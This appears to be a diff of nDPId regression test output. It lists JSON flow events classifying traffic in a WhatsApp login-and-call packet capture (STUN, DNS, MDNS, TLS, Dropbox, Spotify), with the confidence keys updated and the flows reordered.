-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} -00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":198,"flow_first_seen":1432582303300,"flow_last_seen":1432582311036,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":22102,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":52794,"dst_port":9665,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1432582246280,"flow_last_seen":1432582336425,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":2008,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":180,"flow_first_seen":1432582227643,"flow_last_seen":1432582361929,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12974,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"184.173.179.37","src_port":49202,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1432582303186,"flow_last_seen":1432582310134,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":528,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":52794,"dst_port":51727,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1432582228503,"flow_last_seen":1432582353955,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4474,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.110.229.14","src_port":49193,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284806,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1432582247125,"flow_last_seen":1432582324191,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":464,"flow_first_seen":1432582258730,"flow_last_seen":1432582268457,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":483,"flow_tot_l4_payload_len":33432,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","src_port":51518,"dst_port":9344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227526,"flow_last_seen":1432582227594,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":209,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":51897,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}} +00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1432582227604,"flow_last_seen":1432582260448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15132,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.178.104.12","src_port":49201,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} +00705{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1432582238792,"flow_last_seen":1432582267974,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.93.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.79.192","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267973,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.91.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238792,"flow_last_seen":1432582267975,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.73.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267972,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.85.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267971,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.64.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238791,"flow_last_seen":1432582267970,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.70.48","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432582238790,"flow_last_seen":1432582267969,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"31.13.100.14","src_port":51518,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582227595,"flow_last_seen":1432582227624,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":196,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"192.168.2.1","src_port":52190,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.WhatsApp","breed":"Acceptable","category":"Chat"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1432582267983,"flow_last_seen":1432582311138,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":360,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"91.253.176.65","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582245413,"flow_last_seen":1432582245576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.8","src_port":49167,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235999,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.59","src_port":49180,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}} 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1432582235998,"flow_last_seen":1432582236282,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.172.100.37","src_port":49181,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1432582284805,"flow_last_seen":1432582285047,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip6","src_ip":"fe80::da30:62ff:fe56:1c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}} -00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1432582258587,"flow_last_seen":1432582267438,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":660,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"1.194.90.191","src_port":51518,"dst_port":60312,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} -00600{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":53,"flow_first_seen":1432582230648,"flow_last_seen":1432582264928,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15484,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49204,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1253,"source":"whatsapp_login_call.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1432582355253,"flow_last_seen":1432582356195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7941,"flow_avg_l4_payload_len":248,"midstream":0,"thread_ts_msec":1432582361929,"l3_proto":"ip4","src_ip":"192.168.2.4","dst_ip":"17.173.66.102","src_port":49205,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 